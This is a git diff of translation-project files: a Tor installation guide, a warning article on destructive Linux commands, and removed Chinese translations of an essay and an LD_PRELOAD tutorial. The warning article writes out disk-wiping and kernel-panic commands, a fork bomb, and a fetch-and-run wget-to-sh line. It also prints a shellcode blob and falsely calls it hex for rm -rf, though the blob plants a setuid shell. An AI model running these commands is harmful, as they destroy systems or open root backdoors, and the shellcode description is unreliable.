For installing Tor network on Ubuntu machines, we need to add Official Tor repositories. We need to add the repo information to '/etc/apt/sources.list'
|
||||
|
||||
**$ sudo nano /etc/apt/sources.list**
|
||||
|
||||
Now add the repo information mentioned below based on your OS,
|
||||
|
||||
**Ubuntu 16.04**
|
||||
|
||||
**deb http://deb.torproject.org/torproject.org xenial main**
|
||||
**deb-src http://deb.torproject.org/torproject.org xenial main**
|
||||
|
||||
**Ubuntu 14.04**
|
||||
|
||||
**deb http://deb.torproject.org/torproject.org trusty main**
|
||||
**deb-src http://deb.torproject.org/torproject.org trusty main**
|
||||
|
||||
Next open the terminal & execute the following two commands to add the gpg keys used to sign the packages,
|
||||
|
||||
**$ gpg --keyserver keys.gnupg.net --recv-keys A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89**
|
||||
**$ gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -**
|
||||
|
||||
Now run update & install the Tor network,
|
||||
|
||||
**$ sudo apt-get update**
|
||||
**$ sudo apt-get install tor deb.torproject.org-keyring**
|
||||
|
||||
### Debian
|
||||
|
||||
We can install Tor network on Debian without having to add any repositories. Just open the terminal & execute the following command as root,
|
||||
|
||||
**$ apt install tor**
|
||||
|
||||
###
|
||||
|
||||
### Tor Configuration
|
||||
|
||||
If your end game is only to secure the internet browsing & not anything else, then it's better to use Tor Browser, but if you need to secure your apps like Instant Messaging, IRC, Jabber etc, then we need to configure those apps for secure communication. But before we do that, let's check out some [**warnings mentioned on the Tor Website**][2]
|
||||
|
||||
- No torrents over Tor
|
||||
- Don't use any browser plugins with Tor
|
||||
- Use only HTTPS version of the websites
|
||||
- Don't open any document downloaded through Tor while online.
|
||||
- Use Tor bridges when you can
|
||||
|
||||
Now to configure any app to use Tor, for example jabber; firstly select the 'SOCKS proxy' rather than using the HTTP proxy & use port number 9050 or you can also use port 9150 (used by Tor browser).
|
||||
|
||||
![install tor network][4]
|
||||
|
||||
You can also configure Firefox browser to be used on Tor network. Open Firefox browser & goto 'Network Proxy ' settings in 'Preferences' under 'General' tab & make the proxy entry as follows,
|
||||
|
||||
![install tor network][6]
|
||||
|
||||
We can now access Firefox on Tor network with complete anonymity.
|
||||
|
||||
This was our tutorial on how we can install Tor network & use it to surf the internet anonymously. Do mention your queries & suggestions in the comment box below.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/learn-install-tor-network-linux/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/install-tor-browser-linux-ubuntu-centos/
|
||||
[2]:https://www.torproject.org/download/download.html.en#warning
|
||||
[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-1-compressor.png?resize=333%2C240
|
||||
[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/12/tor-2-compressor.png?resize=730%2C640
|
183
sources/tech/20171219 The Linux commands you should NEVER use.md
Normal file
183
sources/tech/20171219 The Linux commands you should NEVER use.md
Normal file
@ -0,0 +1,183 @@
|
||||
The Linux commands you should NEVER use
|
||||
======
|
||||
Unless, of course, you like killing your machines.
|
||||
|
||||
Spider-Man's credo is, "With great power comes great responsibility." That's also a wise attitude for Linux system administrators to adopt.
|
||||
|
||||
No! Really! Thanks to DevOps and cloud orchestration, a Linux admin can control not merely a single server, but tens of thousands of server instances. With one stupid move--like [not patching Apache Struts][1]--you can wreck a multibillion-dollar enterprise.
|
||||
|
||||
Failing to stay on top of security patches is a strategic business problem that goes way above the pay grade of a system administrator. But there are many simple ways to blow up Linux servers, which do lie in the hands of sysadmins. It would be nice to imagine that only newbies make these mistakes--but we know better.
|
||||
|
||||
Here are infamous commands that enable anyone with root access to wreak havoc.
|
||||
|
||||
A word of caution: Never, ever run any of these on a production system. They will harm your system. Don't try this at home! Don't try it at the office, either.
|
||||
|
||||
That said, onward!
|
||||
|
||||
### rm -rf /
|
||||
|
||||
Want to ruin a Linux system in no time flat? You can't beat this classic "worst command ever." It deletes everything--and I mean everything--from your system.
|
||||
|
||||
Like most of these [Linux commands][2], the core program, `rm`, is very handy. It enables you to delete even the most stubborn files. But you're in deep trouble when you combine `rm` with those two flags: `-r`, which forces recursive deletion through all subdirectories, and `-f`, which forces deletion of read-only files without confirmation. If you run it from the / root directory, you'll wipe every last bit of data on your entire drive.
|
||||
|
||||
Just imagine trying to explain that to the boss!
|
||||
|
||||
Now, you might think, "I could never make such a dumb mistake." Oh, my friend, pride goes before a fall. Consider [this cautionary tale from a sysadmin on Reddit][3]:
|
||||
|
||||
> I've been in IT a long time, but today, in Linux, as root, I `rm -r` the wrong path.
|
||||
>
|
||||
> Long story short, I had to copy a bunch of dirs from one path to another and, as you do, I did a couple of `cp -R` to copy the needed about.
|
||||
>
|
||||
> In my wisdom, I tapped the up arrow a couple of times as the dirs to copy are similarly named but they're in amongst a whole bunch of other stuff.
|
||||
>
|
||||
> Anyway, I tapped too far and being distracted as I typed on Skype and Slack and WhatsApp web as well as taking a call from Sage, my brained auto-piloted in: `rm -R ./videodir/* ../companyvideodirwith651vidsin/`
|
||||
|
||||
And there went corporate video file after file into the void. Fortunately, after much frantic pounding of `control-C`, the sysadmin managed to stop the command before it deleted too many files. But let this be a warning to you: Anyone can make this mistake.
|
||||
|
||||
True, most modern systems warn you in great big letters before you make this blunder. However, if you are busy or distracted as you pound away on the keyboard, you can type your system into a black hole.
|
||||
|
||||
There are sneakier ways to get rm -rf. Consider the code below:
|
||||
|
||||
`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
|
||||
|
||||
`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
|
||||
|
||||
`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
|
||||
|
||||
`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
|
||||
|
||||
`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
|
||||
|
||||
`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
|
||||
|
||||
`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
|
||||
|
||||
`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
|
||||
|
||||
`/tmp/.beyond;";`
|
||||
|
||||
What is it? It's the hex version of `rm -rf`. Don't run any command unless you know what it is.
|
||||
|
||||
### Bash fork bomb
|
||||
|
||||
Since we are on the topic of odd-looking code, consider this line:
|
||||
```
|
||||
:(){ :|: & };:
|
||||
```
|
||||
|
||||
It may look cryptic to you, but to me, it looks like the infamous [Bash fork bomb][4]. All it does is start new Bash shells, over and over again, until all your system resources are consumed and the system crashes.
|
||||
|
||||
An up-to-date Linux system shouldn't do this. Note, I said shouldn't. I didn't say won't. Properly set up, Linux systems block this behavior from causing too much harm by setting user limits. Usually, users are restricted to allocate only the memory that the machine has available. But if you run the above (or some other [Bash fork bomb variants][5]) as root, you can still knock a server off until it's rebooted.
|
||||
|
||||
### Overwriting the hard drive with garbage
|
||||
|
||||
There are times you want to zap the data from a disk, but for that job, you should use a tool such as [Darik's Boot and Nuke (DBAN)][6].
|
||||
|
||||
But for just making a royal mess of your storage, it's hard to beat running:
|
||||
```
|
||||
Any command > /dev/hda
|
||||
```
|
||||
|
||||
When I say "any command," I mean any command with output. For example:
|
||||
```
|
||||
ls -la > /dev/hda
|
||||
```
|
||||
|
||||
…pipes the directory listing to your main storage device. Given time, and root privileges, this overwrites all the data on your drive. That's always a good way to start the day in a blind panic--or turn it into a [career-limiting crisis][7].
|
||||
|
||||
### Wipe that drive!
|
||||
|
||||
Another all-time favorite way to smoke storage is to run:
|
||||
```
|
||||
dd if=/dev/zero of=/dev/hda
|
||||
```
|
||||
|
||||
With this command, you're writing data to a drive. The `dd` command pulls its data from the special file, which outputs an infinity of zeros, and pours those zeros all over the hard drive.
|
||||
|
||||
Now /dev/zero may sound like a really silly idea, but it has real uses. For example, you can use it to [clear unused space in a partition with zeros][8]. This makes compressing an image of the partition much smaller for data transfer or archival uses.
|
||||
|
||||
On the other hand, its close relative, `dd if=/dev/random of=/dev/hda`, isn't good for much except ruining your day. If you ran this command (please don't), you would cover your storage with random crap. As a half-assed way to hide your secret plans to take over the office coffee machine, it's not bad, but DBAN is a better tool for that job.
|
||||
|
||||
### /dev/null for the loss
|
||||
|
||||
Perhaps it's because our data is precious to us and our confidence in backups is minimal, but many of these "Never do this!" Linux commands have the result of wiping a hard disk or other storage repository. Case in point: Another pair of ways to ruin your storage is to run `mv / /dev/null` or `mv ~ /dev/null`.
|
||||
|
||||
In the former case, you as the root user are sending all the drive's data into the ever-hungry maw of `/dev/null`. In the latter, you're just feeding your home directory into the same vault of emptiness. In either case, short of restoring from a backup, you won't be seeing any of that data ever again.
|
||||
|
||||
When it comes to containers, don't forget data persistence or data storage. 451 Research offers advice.
|
||||
|
||||
[Get the report][9]
|
||||
|
||||
Heck, accounting didn't really need up-to-date receivables files anyway, did they?
|
||||
|
||||
### Formatting the wrong drive
|
||||
|
||||
Sometimes you must format a drive with a command like:
|
||||
```
|
||||
mkfs.ext3 /dev/hda
|
||||
```
|
||||
|
||||
…which formats the primary hard drive with the ext3 file system. But, wait one darn second! What are you doing formatting your main drive! Aren't you using it?
|
||||
|
||||
Make doubly sure when you're formatting drives--be they solid state, flash, or good old ferrous oxide--that you're formatting the partition that really needs it and not one that's already in use.
|
||||
|
||||
### Kernel panics
|
||||
|
||||
Some Linux commands do not put your machine down for the long count. However, a variety of them can cause the kernel to panic. Normally, these failures are caused by hardware issues, but you can do it to yourself.
|
||||
|
||||
When you encounter a kernel panic, you need to reboot the system to get back to work. In some cases, that's a mild annoyance; in others--such as a production system under heavy load--it's a big deal. Examples include:
|
||||
```
|
||||
dd if=/dev/random of=/dev/port
|
||||
|
||||
echo 1 > /proc/sys/kernel/panic
|
||||
|
||||
cat /dev/port
|
||||
|
||||
cat /dev/zero > /dev/mem
|
||||
```
|
||||
|
||||
All of these cause kernel panics.
|
||||
|
||||
Never run a command unless you know what it's supposed to do, which reminds me…
|
||||
|
||||
### Be wary of unknown scripts
|
||||
|
||||
Young or lazy sysadmins like to borrow scripts written by other people. Why reinvent the wheel, right? So, they find a cool script that promises to automate and check all backups. They grab it with a command such as:
|
||||
```
|
||||
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
|
||||
```
|
||||
|
||||
This downloads the script and then shoots it over to the shell to run. No fuss, no muss, right? Wrong. That script may be poisoned with malware. Sure, Linux is safer than most operating systems by default, but if you run unknown code as root, anything can happen. The danger is not only in maliciousness; the script author's stupidity is equally as harmful. You can be bitten by someone else's undebugged code--because you didn't take the time to even read it through.
|
||||
|
||||
You'd never do something like that? Tell me, all those [container images you're running on Docker][10]? Do you know what they're really running? I know too many sysadmins who run containers without verifying what's really in them. Don't be like them.
|
||||
|
||||
### Shutdown
|
||||
|
||||
The moral of these stories is simple. With Linux, you get an enormous amount of control over your system. You can make your servers do almost anything. But you must make certain that you use that power conscientiously. If you don't, you can wreck not just your servers, but your job and your company. Be like Spider-Man, and use your power responsibly.
|
||||
|
||||
Did I miss any? Tweet me at [@sjvn][11] and [@enterprisenxt][12] to tell me which Linux commands are on your "[Never use this!][13]" list.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
|
||||
|
||||
作者:[Steven Vaughan-Nichols][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html
|
||||
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
|
||||
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
|
||||
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
|
||||
[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
|
||||
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
|
||||
[6]:https://dban.org/
|
||||
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
|
||||
[8]:https://unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4
|
||||
[9]:https://www.hpe.com/us/en/resources/solutions/enterprise-devops-containers.html?jumpid=in_insights~510287587~451_containers~badLinux
|
||||
[10]:https://www.oreilly.com/ideas/five-security-concerns-when-using-docker
|
||||
[11]:http://www.twitter.com/sjvn
|
||||
[12]:http://www.twitter.com/enterprisenxt
|
||||
[13]:https://www.youtube.com/watch?v=v79fYnuVzdI
|
@ -1,89 +0,0 @@
|
||||
# [因为这个我要点名批评 Hacker News ][14]
|
||||
|
||||
|
||||
> “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗?
|
||||
不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。”
|
||||
>
|
||||
> — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座
|
||||
|
||||
[指责开源软件总是离奇难用已经不是一个新论点了][5]; 这样的论点之前就被很多比我更为雄辩的人提及过, 甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢?
|
||||
|
||||
在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。
|
||||
|
||||
秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。
|
||||
|
||||
或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。
|
||||
|
||||
_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow **大部分** 的功能呢?这总归会容易很多了吧。*
|
||||
|
||||
好的,问题是什么是 "大部分" 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且
|
||||
与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。
|
||||
|
||||
但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。
|
||||
|
||||
除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot,Reddit 或是 StackOverflow 这些动作影响到。
|
||||
|
||||
在这之后!你会以为你基本已经大功告成了!
|
||||
|
||||
...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。
|
||||
|
||||
那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢?
|
||||
|
||||
正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码:
|
||||
|
||||
```
|
||||
create table QUESTION (ID identity primary key,
|
||||
TITLE varchar(255), --- 为什么我知道你认为是 255
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
USER integer references USER(ID));
|
||||
create table RESPONSE (ID identity primary key,
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
QUESTION integer references QUESTION(ID))
|
||||
```
|
||||
|
||||
如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。
|
||||
|
||||
但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_
|
||||
|
||||
这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制, 提供以 Python 或 Php 为基础的一些系统API, 以便那些可以自如使用 Python 或 Php 的人可以轻松的通过这些编程接口来定制化他们自己的 Badge。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法)
|
||||
|
||||
同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。
|
||||
|
||||
|
||||
开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。
|
||||
|
||||
这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,[Django][12],[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。
|
||||
相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。
|
||||
|
||||
|
||||
所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
||||
|
||||
作者:[Benjamin Pollack][a]
|
||||
译者:[hopefully2333](https://github.com/hopefully2333)
|
||||
校对:[yunfengHe](https://github.com/yunfengHe)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://bitquabit.com/meta/about/
|
||||
[1]:http://www.cs.duke.edu/~ola/
|
||||
[2]:http://www.cs.duke.edu/courses/cps108/spring04/
|
||||
[3]:https://bitquabit.com/categories/programming
|
||||
[4]:https://bitquabit.com/categories/technology
|
||||
[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/
|
||||
[6]:http://news.ycombinator.com/item?id=678501
|
||||
[7]:http://news.ycombinator.com/item?id=678704
|
||||
[8]:http://code.google.com/p/cnprog/
|
||||
[9]:http://code.google.com/p/soclone/
|
||||
[10]:http://en.wikipedia.org/wiki/Words_per_minute
|
||||
[11]:http://github.com/derobins/wmd/tree/master
|
||||
[12]:http://www.djangoproject.com/
|
||||
[13]:http://www.postgresql.org/
|
||||
[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
@ -1,212 +0,0 @@
|
||||
# 动态连接的诀窍:使用 LD_PRELOAD 去欺骗、注入特性和研究程序
|
||||
|
||||
**本文假设你具备基本的 C 技能**
|
||||
|
||||
Linux 完全在你的控制之中。从每个人的角度来看似乎并不总是这样,但是一个高级用户喜欢去控制它。我将向你展示一个基本的诀窍,在很大程度上你可以去影响大多数程序的行为,它并不仅是好玩,在有时候也很有用。
|
||||
|
||||
#### 一个让我们产生兴趣的示例
|
||||
|
||||
让我们以一个简单的示例开始。先乐趣,后科学。
|
||||
|
||||
|
||||
random_num.c:
|
||||
```
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
|
||||
int main(){
|
||||
srand(time(NULL));
|
||||
int i = 10;
|
||||
while(i--) printf("%d\n",rand()%100);
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
我相信,它足够简单吧。我不使用任何参数来编译它,如下所示:
|
||||
|
||||
> ```
|
||||
> gcc random_num.c -o random_num
|
||||
> ```
|
||||
|
||||
我希望它输出的结果是明确的 – 从 0-99 中选择的十个随机数字,希望每次你运行这个程序时它的输出都不相同。
|
||||
|
||||
现在,让我们假装真的不知道这个可执行程序的来源。也将它的源文件删除,或者把它移动到别的地方 – 我们已不再需要它了。我们将对这个程序的行为进行重大的修改,而你不需要接触到它的源代码也不需要重新编译它。
|
||||
|
||||
因此,让我们来创建另外一个简单的 C 文件:
|
||||
|
||||
|
||||
unrandom.c:
|
||||
```
|
||||
int rand(){
|
||||
return 42; //the most random number in the universe
|
||||
}
|
||||
```
|
||||
|
||||
我们将编译它进入一个共享库中。
|
||||
|
||||
> ```
|
||||
> gcc -shared -fPIC unrandom.c -o unrandom.so
|
||||
> ```
|
||||
|
||||
因此,现在我们已经有了一个可以输出一些随机数的应用程序,和一个定制的库,它使用一个常数值 42 实现一个 rand() 函数。现在 … 就像运行 `random_num` 一样,然后再观察结果:
|
||||
|
||||
> ```
|
||||
> LD_PRELOAD=$PWD/unrandom.so ./random_num
|
||||
> ```
|
||||
|
||||
如果你想偷懒或者不想自动亲自动手(或者不知什么原因猜不出发生了什么),我来告诉你 – 它输出了十次常数 42。
|
||||
|
||||
它让你感到非常惊讶吧。
|
||||
|
||||
> ```
|
||||
> export LD_PRELOAD=$PWD/unrandom.so
|
||||
> ```
|
||||
|
||||
然后再以正常方式运行这个程序。一个未被改变的应用程序在一个正常的运行方式中,看上去受到了我们做的一个极小的库的影响 …
|
||||
|
||||
##### **等等,什么?刚刚发生了什么?**
|
||||
|
||||
是的,你说对了,我们的程序生成随机数失败了,因为它并没有使用 “真正的” rand(),而是使用了我们提供的 – 它每次都返回 42。
|
||||
|
||||
##### **但是,我们 *告诉* 它去使用真实的那个。我们设置它去使用真实的那个。另外,在创建那个程序的时候,假冒的 rand() 甚至并不存在!**
|
||||
|
||||
这并不完全正确。我们只能告诉它去使用 rand(),但是我们不能去选择哪个 rand() 是我们希望我们的程序去使用的。
|
||||
|
||||
当我们的程序启动后,(为程序提供需要的函数的)某些库被加载。我们可以使用 _ldd_ 去学习它是怎么工作的:
|
||||
|
||||
> ```
|
||||
> $ ldd random_num
|
||||
> linux-vdso.so.1 => (0x00007fff4bdfe000)
|
||||
> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000)
|
||||
> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000)
|
||||
> ```
|
||||
|
||||
